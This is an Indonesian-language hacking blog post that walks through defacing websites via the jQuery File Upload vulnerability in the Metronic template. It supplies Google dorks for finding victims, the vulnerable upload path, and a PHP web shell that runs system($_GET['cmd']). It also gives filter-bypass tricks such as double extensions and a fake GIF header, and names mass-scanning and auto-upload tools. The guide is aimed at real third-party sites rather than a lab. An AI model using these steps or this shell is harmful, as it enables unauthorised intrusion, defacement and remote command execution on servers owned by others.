Deface via jQuery File Upload Vulnerability (Metronic Target)

Deface via jQuery File Upload Vulnerability (Metronic Target)

Cara Deface dengan Exploit jQuery File Upload Vulnerability

by: Nyx6st

Apa Itu jQuery File Upload Vulnerability?

jQuery File Upload adalah plugin yang memungkinkan pengguna mengunggah file ke server. Celah ditemukan pada direktori /server/php/ karena kurangnya validasi dan konfigurasi `.htaccess`, terutama pada server Apache 2.4 ke atas.

Bug ini memungkinkan kita mengunggah file arbitrer seperti gambar palsu, script JavaScript, bahkan shell/backdoor PHP jika endpoint tersebut belum diamankan.

Target: Metronic Template

Banyak situs yang menggunakan template Metronic memiliki struktur folder default seperti: /assets/global/plugins/jquery-file-upload/

Dork Google

Cari target dengan dork berikut:

inurl:/assets/global/plugins/jquery-file-upload/
inurl:/assets/plugins/jquery-file-upload
intext:"Metronic Shop UI description."

Gabungkan untuk mendapatkan target akurat:

inurl:jquery-file-upload intext:"Metronic Shop UI"

Langkah Eksploitasi

  1. Akses endpoint eksploit:
    https://target.com/assets/global/plugins/jquery-file-upload/server/php/

    (Bisa berbeda tergantung lokasi folder, coba juga: assets/plugins/ atau public/assets/)

  2. Jika terbuka, coba upload file berekstensi .php, .phtml, atau .jpg.php. Misalnya:
    deface.php
    
    <?php
    
    echo "Hacked by 0x6ick!";
    
    system($_GET['cmd']);
    
    ?>
    
          
  3. Setelah berhasil, akses URL payload yang terupload, biasanya di:
    https://target.com/assets/global/plugins/jquery-file-upload/server/php/files/deface.php
  4. Jika berhasil dieksekusi, berarti server vulnerable dan siap dieksploitasi lebih lanjut.

Bypass & Teknik Lanjutan

  • Rename file: Gunakan shell.php.jpg jika filter hanya melihat ekstensi terakhir.
  • Fake GIF header: Tambahkan GIF89a di awal shell PHP untuk lolos MIME check.
  • Content-Type: Gunakan multipart/form-data saat upload pakai curl/postman.
  • Manfaatkan Burp Suite: Tangkap lalu modifikasi request upload secara manual.

Scanner Tools & Automation

  • jQueryUploadScanner.py: Python tool untuk mass scan folder jquery-file-upload/server/php
  • 6ickUploader: Auto upload shell dan cek path
  • Dork Scraper: Ambil semua target dari Google secara otomatis

Legal Notes

Where Creativity, Exploitation, and Expression Collide.

Penutup

Celah jQuery File Upload adalah contoh klasik dari bagaimana developer lalai menghapus file demo setelah deployment. Meski bug ini tergolong lawas, tapi banyak situs legacy masih rentan karena hanya copy-paste folder Metronic atau AdminLTE tanpa proteksi tambahan.

Post a Comment

Lebih baru Lebih lama

Mengenai Saya

Foto saya
6ickzone
I've been deep in the world of cybersecurity, crypto, AI, and hacking for years. This blog is where I share my journey, tools, tips, and everything I learn along the way. But beyond code and exploits, there's also rhythm. I'm also exploring the digital soundscape — producing beats, fusing dark tech vibes with trap, drill, and EDM. Music is my second language, and it's where I channel the energy of the underground digital world. From my early days as a defacer to my current focus on ethical hacking and experimental music, I’m building 6ickzone as a hybrid space where hacking meets art. Why 6ickzone? 6ickzone is more than just a blog — it's a realm where hackers, beatmakers, and digital renegades gather. Whether you're here for the tools or the tunes, welcome to the zone.
Lihat profil lengkapku

Cari Blog Ini

About